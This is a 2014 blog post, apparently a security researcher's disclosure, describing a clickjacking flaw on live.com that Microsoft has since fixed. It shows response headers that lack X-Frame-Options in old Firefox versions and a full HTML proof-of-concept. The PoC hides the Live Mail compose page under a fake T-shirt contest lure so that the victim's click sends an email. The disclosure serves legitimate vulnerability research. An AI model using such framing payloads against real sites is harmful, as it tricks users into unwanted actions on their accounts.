UI redress attack on live.com (affected all pages).

April 17, 2014

On 7/29/13 I’ve reported Live.com XFO vulnerability to the Microsoft Security team and finally their investigation came to conclusion and fixed the bug. So, Here is details of bug and timeline of fixing bug. A year ago on the weekend, I started digging into MS services for bugs and this vulnerability seems to be more interesting to share on the Garage4Hackers.

The timeline of investigation of the bug : July 29, 2013 – April 16 , 2014.

Name:  msresponse.jpg
Views: 0
Size:  23.1 KB

The interesting part of the vulnerability all pages were protected for UI Addressing Attack and while doing testing, normally I test application on the all browsers. The weird part comes here, I was able to iframe the all the pages of Live.com including pre-authentication and post-authentication pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on other browser all pages functionality of XFO was working perfectly.

Random announcement , nothing do with this post : Check out recorded video of Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis By David Rude II aka Bannedit
Note : Have look the same vulnerability on Facebook Application Installing

Obviously , you must be thinking why this thing is happening with Mozilla. After doing some research and consulting with G4H team , I’ve concluded, it may be issue with Gecko Engine. The test environment was win 7 , ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do reply on this thread.

Check out the following headers , XFO header is missing on Gecko/20120306 Firefox/3.6.28 to MF 6.

Code:
        https://blu166.mail.live.com/m/?bfv=wm

        GET /m/?bfv=wm HTTP/1.1
        Host: blu166.mail.live.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Cookie:

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm; domain=.live.com; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie: domain=.live.com; path=/
        Set-Cookie: xidseq=7; domain=.live.com; path=/
        Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here is some print screen of basic operations of live.com (I would like to remind you , every page of live.com was vulnerable )

Attacker developed this page to attack on victim.

Composing Email :

Uploading Attachment :

Deleting Emails :

[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG]

HTML POC , which i used sent to MS Security Team

Code:
<html>
<!-- This Quick Developed POC , for testing purpose --!>
<!-- Visit Garage4hackers.com  --!>
<head>
	<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
	<style>
		iframe { 
		  width:800px;
		  height:800px;
		  position:absolute;
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
		  opacity:0.5;
		}
	</style>
</head>
<body>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>

    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
	<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

</body>
</html>

Let me know if you have any question about this bug

– [S]

We Provide Penetration Testing

Leave a Reply

Your email address will not be published. Required fields are marked *

*




We Provide Penetration Testing